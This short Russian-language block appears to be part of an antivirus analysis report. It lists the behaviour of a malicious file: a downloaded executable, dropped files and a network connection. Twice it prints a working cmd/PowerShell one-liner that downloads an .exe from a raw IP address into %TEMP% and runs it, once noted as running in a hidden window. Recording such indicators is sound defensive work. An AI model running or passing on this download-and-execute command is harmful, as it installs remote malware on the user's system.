Техническая информация
- http://216.170.126.99/3.exe как %temp%\tusent.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://216.170.126.99/3.exe','%TEMP%\tusent.exe');Start-Process '%TEMP%\tusent.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
- %TEMP%\1052476.cvr
- '21#.#70.126.99':80
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://216.170.126.99/3.exe','%TEMP%\tusent.exe');Start-Process '%TEMP%\tusent.exe';' (со скрытым окном)